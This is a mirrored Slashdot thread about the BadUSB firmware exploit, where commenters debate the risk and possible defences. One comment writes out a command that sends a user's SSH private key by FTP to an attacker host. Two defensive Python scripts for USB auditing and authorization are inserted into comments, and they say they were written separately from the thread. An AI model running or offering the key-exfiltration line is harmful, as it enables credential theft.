Slashdot Mirror


"BadUSB" Exploit Makes Devices Turn "Evil"

An anonymous reader writes with a snippet from Ars Technica that should make you (even more) skeptical about plugging in random USB drives, or allowing persons unknown physical access to your computer's USB ports: When creators of the state-sponsored Stuxnet worm used a USB stick to infect air-gapped computers inside Iran's heavily fortified Natanz nuclear facility, trust in the ubiquitous storage medium suffered a devastating blow. Now, white-hat hackers have devised a feat even more seminal—an exploit that transforms keyboards, Web cams, and other types of USB-connected devices into highly programmable attack platforms that can't be detected by today's defenses. Dubbed BadUSB, the hack reprograms embedded firmware to give USB devices new, covert capabilities. In a demonstration scheduled at next week's Black Hat security conference in Las Vegas, a USB drive, for instance, will take on the ability to act as a keyboard that surreptitiously types malicious commands into attached computers. A different drive will similarly be reprogrammed to act as a network card that causes connected computers to connect to malicious sites impersonating Google, Facebook or other trusted destinations. The presenters will demonstrate similar hacks that work against Android phones when attached to targeted computers. They say their technique will work on Web cams, keyboards, and most other types of USB-enabled devices.

37 of 205 comments

  1. USB 4.x to offer signed USB device signatures??? by Anonymous Coward · · Score: 5, Interesting

    Here comes the digitally signed / encrypted usb dongles for USB 4.x, where every device has a firmware signature encrypted within the device and part of the usb handshake will be to read the entire firmware to re-calc the signature to make sure it matches, with a 3rd comparison via the internet to a usb device registry.

    Then the criminals will figure out how to falsify the signature with the bad firmware anyway.

  2. Leverage by PRMan · · Score: 3, Informative

    And everyone said that when Hardison would program USB sticks to type stuff and send all the data back to headquarters when they just plugged it in a computer that it was not real. It turns out he was just ahead of everyone else.

    --
    Peter predicted that you would "deliberately forget" creation 2000 years ago...
  3. Re:USB 4.x to offer signed USB device signatures?? by fustakrakich · · Score: 2

    ...with a 3rd comparison via the internet to a usb device registry.

    That makes the whole concept dead on arrival. Anything that requires a connection is no damn good, aside from a remote terminal, I suppose.

    --
    “He’s not deformed, he’s just drunk!”
  4. Re:and this is news why? by halfEvilTech · · Score: 2

    and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.

  5. Re:Do I need to be concerned about this? by tbuddy · · Score: 2

    nah. dunk your computer and USB device in holy water and it's good to go again.

  6. Re:How is this viable as an attack medium? by gstoddart · · Score: 4, Interesting

    The most I can see happening with this is someone putting bad firmware onto a USB device and selling them on EBay or similar as a means of stealing people's data, but I think that would be pretty easy to track

    Really? Because the worst I can imagine is the NSA or another spy agency getting a shipment of devices from the manufacturer so that when you get it delivered new and in the box it's already compromised. Your brand new shiny Dell or HP would be compromised from the factory.

    Think I've not got enough layers of tinfoil? Google for "Cisco NSA routers".

    At this point, if it can be exploited by these clowns, it will be.

    law enforcement will figure out the trick pretty quickly

    Unless, of course, it's law enforcement who have done it.

    --
    Lost at C:>. Found at C.
  7. Re:and this is news why? by blueg3 · · Score: 3, Informative

    The whole point of this is that the malware reprograms the firmware of existing, trusted devices to make them malicious.

  8. Re:and this is news why? by Canth7 · · Score: 5, Insightful

    I thought it was common sense not to plug in untrusted devices to your computer. Especially unknown thumb drives, unless you can use them in a read only device.

    The problem at hand is that you can take a trustworthy device, plug it into an infected computer and then your trustworthy device becomes compromised and not easily detectably so, infecting your formerly clean PC. So far, no comments on mitigating procedures or OS specific circumstances. Most OSes will automatically load USB devices so in theory this could affect just about every OS whereby a compromised phone decides to become a keyboard and starts typing keystrokes and sending data to a 3rd party. Scary, at least in theory.

  9. Simple by NotInHere · · Score: 2

    just ask the user whether they want that second keyboard, network card, or mouse attached. And a malicious DNS server is also not the thing that doesn't let me sleep at night -- https was designed for that.

    1. Re:Simple by stewsters · · Score: 5, Funny

      "Click OK to connect mouse"

      It leaves a bit of a chicken-and-egg problem for normal users of systems without a keyboard built in.

  10. Re:Do I need to be concerned about this? by thieh · · Score: 4, Funny

    Nah, we are already screwed beyond help.

  11. Old attack by robmv · · Score: 4, Insightful

    This kind of attack is not new, the new part are the examples of generic devices with hacked firmware to do that. This can be solved easily by requesting user authorization before activating any USB device type, for example, before telling the system that there is a new USB network device, ask the user for confirmation. The trick is with input devices, where the new device could be replacing a broken one (keyboard or mouse); the confirmation can be done by requesting the user to type a code displayed on screen or using the mouse on an on-screen keyboard in order to accept the input device for general usage. The other problem is with devices permanently attached: assume that any device attached at boot time is trusted. If someone replaced your USB device when you weren't present, other more awful things could have been done.
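    As an added illustration of the policy sketched in this comment and in comment 9 ("just ask the user whether they want that second keyboard"), here is a small simulation of per-interface USB authorization. It is example code written for this page, not code from the thread, from Slashdot, or from the BadUSB researchers. The bInterfaceClass values (0x03 for HID, 0x08 for mass storage, 0x02 for CDC) are the real USB class codes; the `Authorizer` API, the six-digit typed challenge, and the sysfs-style device names are this example's own assumptions. The policy follows the comment: devices present at boot are trusted, a new non-input interface needs a yes/no confirmation answered from an already-trusted input device, and a new HID interface is enabled only after the user types a code that is shown on screen, which a firmware-only "keyboard" with no view of the display cannot do.

```python
# Added example (not code from the thread): simulation of the per-interface USB
# authorization policy from comment 11.  Class codes are the real USB
# bInterfaceClass values; the Authorizer design and the typed-challenge flow
# are this example's own assumptions.
import secrets
from dataclasses import dataclass, field

HID = 0x03  # keyboards and mice: gated by a code the user must type back


@dataclass(frozen=True)
class UsbDevice:
    dev_id: str               # sysfs-style bus path, e.g. "1-1.4"
    interface_classes: tuple  # bInterfaceClass of each interface, in order


@dataclass
class Authorizer:
    # (dev_id, iface) pairs the OS may bind a driver to
    enabled: set = field(default_factory=set)
    # non-input interfaces waiting for a yes/no answer from a trusted input device
    awaiting_confirmation: set = field(default_factory=set)
    # (dev_id, iface) -> code currently displayed on screen for that HID interface
    challenges: dict = field(default_factory=dict)

    def trust_boot_devices(self, devices):
        """Comment 11's trade-off: whatever is attached at boot is assumed to be the owner's."""
        for dev in devices:
            for iface in range(len(dev.interface_classes)):
                self.enabled.add((dev.dev_id, iface))

    def attach(self, dev):
        """Hot-plug event.  Returns {iface: action}; no driver binds until the action succeeds."""
        actions = {}
        for iface, cls in enumerate(dev.interface_classes):
            key = (dev.dev_id, iface)
            if key in self.enabled:
                actions[iface] = "enabled"
            elif cls == HID:
                # Shown on the display only; a device that cannot see the screen cannot type it.
                self.challenges[key] = "".join(secrets.choice("0123456789") for _ in range(6))
                actions[iface] = "type-code"
            else:
                # Storage, network, etc.: plain yes/no prompt answered from a trusted input device.
                self.awaiting_confirmation.add(key)
                actions[iface] = "confirm"
        return actions

    def confirm(self, dev_id, iface, accepted):
        """Answer to the yes/no prompt for a non-input interface."""
        key = (dev_id, iface)
        if key not in self.awaiting_confirmation:
            return False
        self.awaiting_confirmation.discard(key)
        if accepted:
            self.enabled.add(key)
        return accepted

    def answer_challenge(self, dev_id, iface, typed):
        """Keystrokes arriving from the new HID interface itself.  One attempt per plug-in:
        a wrong code discards the challenge, so guessing needs a visible re-plug each time."""
        key = (dev_id, iface)
        expected = self.challenges.pop(key, None)
        if expected is None:
            return False
        if secrets.compare_digest(typed, expected):
            self.enabled.add(key)
            return True
        return False

    def is_enabled(self, dev_id, iface):
        return (dev_id, iface) in self.enabled


if __name__ == "__main__":
    auth = Authorizer()
    auth.trust_boot_devices([UsbDevice("1-1", (HID,))])        # the real keyboard
    stick = UsbDevice("1-1.4", (0x08, HID))                     # flash drive that is also a "keyboard"
    print(auth.attach(stick))                                   # {0: 'confirm', 1: 'type-code'}
    print(auth.is_enabled("1-1.4", 1))                          # False until the code is typed
```

    Note that a composite device is handled interface by interface: the storage half of the stick can be accepted while its keyboard half stays disabled, which is the case a single per-device prompt would get wrong.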

  12. Re:How is this viable as an attack medium? by Anubis+IV · · Score: 3

    I've heard about a few cases (which is a fancy way of saying, "I once heard a third-hand story, but am too lazy to fact check myself at the moment") of attackers leaving thumb drives in parking lots outside the buildings of offices they wanted to hack, as if the drives had been dropped out there by accident after slipping out of a pocket. Employees of the company inevitably found the drives, some of them kept the drives for personal use, and some of those drives eventually got plugged into computers inside the office. With AutoPlay settings and the like, it used to be fairly trivial for malware to enter an office that way.

    Which is to say, if you find a USB drive in your company's parking lot, toss it in the trash if you can't find the original owner.

  13. Re:How is this viable as an attack medium? by blueg3 · · Score: 4, Interesting

    1. A ton of USB devices are actually implemented as general-purpose components with programmable firmware (attached to whatever support hardware, like a network card or a webcam, is necessary). So they're more common than you think.

    2. Smartphones are an excellent reprogrammable USB device that lots of individuals have.

    3. This is difficult enough to really engineer well that it is probably a bigger threat as a targeted attack against a big organization for now. Until someone does the engineering to make it easy to deploy widely. Then, it'll be a threat for everyone. Kind of like automated hacking of consumer-grade routers to modify the firmware to participate in an Internet-wide portscan. It's the Metasploit effect: it's not a big problem until someone makes it automated, then it is.

  14. Safety first, kids... by blueshift_1 · · Score: 5, Funny

    Just another reason why you shouldn't stick foreign objects in your orifices...

    1. Re:Safety first, kids... by gstoddart · · Score: 3, Funny

      "Just another reason why you shouldn't stick foreign objects in your orifices..."

      www.bad-dragon.com is okay though.

      Must .... not ... paste ... URL ... into ... browser

      Gak, that's so wrong, you sick bastard. ;-)

      --
      Lost at C:>. Found at C.
  15. Re:and this is news why? by NMBob · · Score: 4, Interesting

    Or they could already come programmed from a "trusted" factory. It's not like that hasn't happened before. Yikes!

  16. Re:and this is news why? by NJRoadfan · · Score: 3, Informative

    and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.

    Let them try reprogramming a Model M keyboard. There is one perk to legacy PS/2 ports: they are secure!

  17. Limited scope of vulnerability by jrumney · · Score: 2

    OK, this makes a bit more sense than the MSM version I read half an hour ago. In that article, they made it sound like USB keyboards were spreading a virus by reprogramming the USB controller chips on motherboards, which sounded a bit too far fetched to me (maybe one brand could be vulnerable - but a widespread problem?). In the Ars story it sounds more like they are reprogramming the firmware in the USB device itself to act as a different device. Cute trick, possibly useful against a carefully chosen target, but the likelihood of a widespread attack seems minimal. And auditing your devices would be quite easy - just keep an eye on what device types are showing up in /sys/bus/usb or device manager.

  18. Re:How is this viable as an attack medium? by Anonymous Coward · · Score: 5, Interesting

    Smartphones are the big problem. People think it is acceptable to just plug them in everywhere to "just charge them".

    I can go to a train station or another reasonable public spot, look for a power outlet and plug in my "charging station" that turns a smartphone into a malicious device.
    This will infect devices from a very diverse group that will travel around and connect their devices to whatever USB-port they can find.

  19. How many have been bulk-mailed for Fortune 500s? by swb · · Score: 3, Insightful

    If you had the money/resources, you could create these things by the thousand and bulk-mail these to major companies. It would stand to reason that somebody would end up plugging them into their office computer, enabling a back door.

    You could go even further and create hacked 5 port switches or access points and ship them off to big company branch offices, where users may be more likely to ignore standards or be short on resources and use those kinds of things anyway. You could put a return label on it for the office supply company or even the HQ office so that users thought it was something they had gotten by accident.

    I'd bet in a lot of cases people would just say "sweet" and go ahead and use them in the office, giving you a back door. A switch or access point would have enough space inside that custom hardware could be inserted giving a lot better back door, like having your own computer on their network.

  20. Re:USB 4.x to offer signed USB device signatures?? by Anonymous Coward · · Score: 3, Insightful

    Wouldn't it be much simpler to make USB device firmware not upgradeable? When have you ever updated the firmware on a mouse or keyboard? If there's a legitimate need to leave them upgradeable, put in a jumper or switch that is off by default.

  21. Re:and this is news why? by Anonymous Coward · · Score: 2, Informative

    As far as I can tell from the article it's not "malware reprograms", it's "malicious third party with physical access to USB device reprograms".

    Quite a bit of difference.

  22. Re:Do I need to be concerned about this? by Anonymous Coward · · Score: 2, Interesting

    Yes, the "white-hat hackers" are Karsten Nohl and his gang. That's the guy behind the GSM hack. If he wants to know the algorithm that a smart card uses for encryption, he removes layer by layer of the chip and reconstructs the algorithm from the circuits. Nohl does not kid around. If he says it can be hacked, it can.

  23. Re:and this is news why? by janoc · · Score: 4, Insightful

    I would love to see malware that will reprogram a mask-programmed blob in common throwaway hardware. Or a microcontroller in a webcam that doesn't even have the programming pins (typically some sort of ISP or JTAG) connected to anything USB accessible (or not even connected at all, at best to some test pads).

    A typical USB stick or a webcam don't have hardware to permit firmware upgrades, even though the silicon inside could be theoretically upgradable. Not to mention that the exploit would have to be written specifically for the target hardware - different processors, memory layout, USB interface, etc - all that would make it really hard to produce a generic malware. If you want to see what is involved in something like that, look at the article on hacking HDD controllers:
    http://spritesmods.com/?art=hd... And that is a hard drive, which are produced by only a few manufacturers and have relatively standardized interfaces and controllers. Now imagine having to do that sort of reverse engineering on every type of hard drive in common use if you wanted to write a reasonably effective malware (e.g. a data stealing worm). It is much easier to exploit some Windows bug or use a phishing scam than this.

    So yes, this is potentially a threat, but panicking over your USB sticks or webcams going rogue on you is vastly overblown. This could be an issue for a very targeted attack where the benefits of compromising e.g. a keyboard of a high value target will outweigh the effort required, but not really anything else. And that assumes that the keyboard is actually able to be updated! It would probably be simpler to just send an operative in and install e.g. a keylogger ...

    Oh and they mention the "BadBios" story ... Nobody was ever able to confirm that apart from the original very confused researcher.

  24. Re:and this is news why? by Blaskowicz · · Score: 2

    The best security in this case is if there were no PS/2 keyboard connected before, then it won't be recognised until the computer is shut down or rebooted.
    If you use a Model M, you will probably even fry the PS/2 port - but an "evil" Model M would have a replacement micro-controller that wouldn't fry the port by drawing too much current, like keyboards from the 90s and 00s don't.

  25. Re:USB 4.x to offer signed USB device signatures?? by Anonymous Coward · · Score: 2, Informative

    What they are talking about here infects on firmware/driver level initialization between USB device and computer when plugged in that is an inherent part of the USB standard, before and invisible to any user mode (software) inspection (and how do you plan to see/test that the usb firmware is not infected?). This is not your regular Windows auto-run type problem.

  26. Re:USB 4.x to offer signed USB device signatures?? by jakimfett · · Score: 2

    At the point where a hacker has physical access to one of your machines, you have bigger problems than whether they're going to swap out your mouse for something more easily hackable.

    --
    Bits of code, random ramblings: jakimfett.com
  27. Re:How is this viable as an attack medium? by jakimfett · · Score: 2

    I'd be interested to see how well this works against linux workstations. Having the ability to arbitrarily send keyboard commands will only be effective if a) they're the correct key commands (e.g., the shortcut to open the terminal client, or a web browser, which changes depending on your desktop environment) and you can actually *do* those commands. E.g., "rm -rf /" isn't going to work without the superuser password.

    That said...something like "cd ~/.ssh;ftp attack@myserver.hack;put id_rsa;exit" wouldn't necessarily need any sort of high level access...and getting ahold of someone's private key is akin to getting the holy grail, especially if you can do it without them realizing it.

    --
    Bits of code, random ramblings: jakimfett.com
  28. Re:Do I need to be concerned about this? by Penguinisto · · Score: 3, Interesting

    Depends.

    I once worked for a company that wrote web banking software. The laptops/desktops/etc of certain employees had a 'driver' that continually monitored the USB ports. If anything plugged into it that had storage on it but not the proper corporate auth key to connect as an approved storage device? It would automatically send an email to the IT department, immediately shut off the entire USB subsystem in the OS, and it stayed that way until the device was re-imaged (in many cases making the device completely useless). It also got you immediately perp-walked out of the building and freshly unemployed, unless you could immediately give them a reasonable (and provable) explanation as to why it happened.

    Now in this case, I suspect that if the bad stick presented itself to the OS as a keyboard/mouse/whatever, it may circumvent that (I say "may" because I don't know if it would be able to dump any non-keyboard/mouse-related data onto the machine w/o presenting itself as storage.)

    Either way, if you're that worried about it, then epoxy the USB ports shut (well, except on the phone for obvious reasons...)

    --
    Quo usque tandem abutere, Nimbus, patientia nostra?
  29. Re:USB 4.x to offer signed USB device signatures?? by mythosaz · · Score: 2

    ...except that plenty of people, even those who should know better, are willing to accept a free flash drive.

    And that flash drive is also a HID device, and it's going to sometimes send a series of keystrokes that issue commands you don't like.

    This entire hack depends on a device that looks like a keyboard, not being a keyboard, but being a keyboard AND a network card - or a flash drive that's ALSO a HID device - or a webcam that's also a BT receiver.
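    The composite-device shape this comment describes (storage that is also a HID or network interface) is exactly what the sysfs audit suggested in comment 17 ("keep an eye on what device types are showing up in /sys/bus/usb") can catch. The following is an added example written for this page, not code from either commenter, from Slashdot, or from the BadUSB researchers: it reads the per-interface `bInterfaceClass` files that Linux really does expose under `/sys/bus/usb/devices/<dev>:<config>.<iface>/`, diffs the current inventory against a baseline taken on a known-good day, and flags any single device that mixes mass storage with HID, CDC/network or wireless classes. The baseline and current snapshots in the block are constructed for the demonstration; the function and finding names are this example's own.

```python
# Added example (not code from the thread): audit of USB interface classes as
# exposed in /sys/bus/usb, covering the auditing idea in comment 17 and the
# "flash drive that is also a HID device" shape in comment 29.  The sysfs path
# and file names are real Linux conventions; the two snapshots are constructed.
import re
from pathlib import Path

SYSFS_USB = Path("/sys/bus/usb/devices")
HID, CDC, MASS_STORAGE, HUB, WIRELESS = 0x03, 0x02, 0x08, 0x09, 0xE0
CLASS_NAMES = {HID: "hid", CDC: "cdc/network", MASS_STORAGE: "storage",
               HUB: "hub", WIRELESS: "wireless"}

# Interface directories are named <bus>-<port path>:<config>.<interface>, e.g. "1-1.4:1.0"
IFACE_DIR = re.compile(r"^(?P<dev>\d+-[\d.]+):(?P<cfg>\d+)\.(?P<iface>\d+)$")


def inventory(entries):
    """Build {device: frozenset(interface classes)} from (interface_dir_name, bInterfaceClass text)."""
    inv = {}
    for dir_name, cls_text in entries:
        m = IFACE_DIR.match(dir_name)
        if m:
            inv.setdefault(m["dev"], set()).add(int(cls_text.strip(), 16))
    return {dev: frozenset(classes) for dev, classes in inv.items()}


def live_entries(root=SYSFS_USB):
    """Yield the same (dir_name, text) pairs from the real sysfs tree (Linux only)."""
    for path in root.glob("*:*/bInterfaceClass"):
        yield path.parent.name, path.read_text()


def is_badusb_shape(classes):
    """One device that is storage AND an input or network device: the pattern in the article."""
    return MASS_STORAGE in classes and bool(classes & {HID, CDC, WIRELESS})


def audit(baseline, current):
    """Compare a trusted snapshot with the current one; returns (kind, device, classes) findings."""
    findings = []
    for dev, classes in sorted(current.items()):
        if dev not in baseline:
            findings.append(("new-device", dev, classes))
        elif classes != baseline[dev]:
            # symmetric difference: the interface classes that appeared or vanished
            findings.append(("class-change", dev, classes ^ baseline[dev]))
        if is_badusb_shape(classes):
            findings.append(("storage+hid/net", dev, classes))
    for dev in sorted(baseline.keys() - current.keys()):
        findings.append(("removed", dev, baseline[dev]))
    return findings


def describe(classes):
    return ",".join(CLASS_NAMES.get(c, f"0x{c:02x}") for c in sorted(classes))


# Constructed samples: a baseline taken when the machine was set up, and a later
# snapshot in which the flash drive on port 1-1.4 has grown a keyboard interface
# and an unknown CDC (network) device has appeared on port 1-2.
BASELINE = inventory([("1-0:1.0", "09\n"), ("1-1:1.0", "03\n"), ("1-1.4:1.0", "08\n")])
CURRENT = inventory([("1-0:1.0", "09\n"), ("1-1:1.0", "03\n"),
                     ("1-1.4:1.0", "08\n"), ("1-1.4:1.1", "03\n"), ("1-2:1.0", "02\n")])

if __name__ == "__main__":
    for kind, dev, classes in audit(BASELINE, CURRENT):
        print(f"{kind:16} {dev:8} {describe(classes)}")
```

    On a real machine the snapshots come from `inventory(live_entries())`; persist the baseline somewhere the user of the machine cannot quietly rewrite, and treat a "class-change" on a device you did not replace as worth a physical look, since the storage itself can be perfectly intact while the firmware has changed what the device claims to be.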

  30. Re:Do I need to be concerned about this? by EvilSS · · Score: 4, Insightful

    Are you:
    * A bank?
    * A utility?
    * A large corporation?
    * A defense contractor?
    * A military?
    * A government?
    * A "whistleblower" (in the figurative sense, not someone who just blows a literal whistle)?
    * A journalist?
    * A civil rights/government abuse/environmental/economic activist?
    * Are you a member of an "anti-government" group or movement?
    * Are you Muslim?
    * Are you or have you ever been brown?
    * Now or will you in the future travel through a customs inspection area of any country?
    * Under active investigation by a law enforcement agency?
    * A rabble-rouser?
    * A person with opinions that are counter to those of your government?
    * A sentient artificial lifeform?

    If you answered yes to any of the above, then yes you need to be worried. If you did not, then no, you probably don't need to be worried.

    --
    I browse on +1 so AC's need not respond, I won't see it.
  31. ftdi, Atmel are VERY common in devices. I did it. by raymorris · · Score: 2

    I bet at least 20% of the USB devices use the same FTDI chip for USB functionality, and another 20% use Atmel AVR microcontrollers. If your malware patched or replaced the Atmel firmware, you could own a lot of systems.

    It wouldn't even NEED to continue to work like the original device, so you could just replace the firmware with the Atmel firmware I wrote last night. The user plugs in their webcam or tries to turn it on. The webcam doesn't work anymore. The bad guy doesn't care, at that point he has already owned the machine, just a few seconds after the device was plugged in.

  32. Re:and this is news why? by melstav · · Score: 2

    A typical USB stick or a webcam don't have hardware to permit firmware upgrades, even though the silicon inside could be theoretically upgradable.

    How uninformed you are!

    https://forums.hak5.org/index.php?/topic/8630-collection-of-production-tools-for-usb-devices/ is a discussion of "production tools" for USB flash drives.

    These tools are specific to the controller in the flashdrive (chipsbank, micov, etc) and allow you to do things like change what size the drive reports itself as, load files onto the thing and make it behave as a read-only flash drive, load files on and make it behave as a USB CD/DVD-ROM drive with a disk preloaded, make it behave as a single flashdrive with multiple partitions, make it come up on the USB bus as a compound device consisting of any combination of the above.

    My company uses these sorts of tools to distribute software on read-only flashdrives.

  33. Re:Do I need to be concerned about this? by Anonymous Coward · · Score: 4, Funny

    Negative, I am a meat popsicle.

  34. Re:Do I need to be concerned about this? by hankwang · · Score: 2

    "If anything plugged into it that had storage on it ... It also got you immediately perp-walked out of the building and freshly unemployed," Nice opportunity to get rid of a co-worker when he's away for a bathroom break...

  35. Re:USB 4.x to offer signed USB device signatures?? by jakimfett · · Score: 2

    I eat Cheetos, you insensitive clod!

    --
    Bits of code, random ramblings: jakimfett.com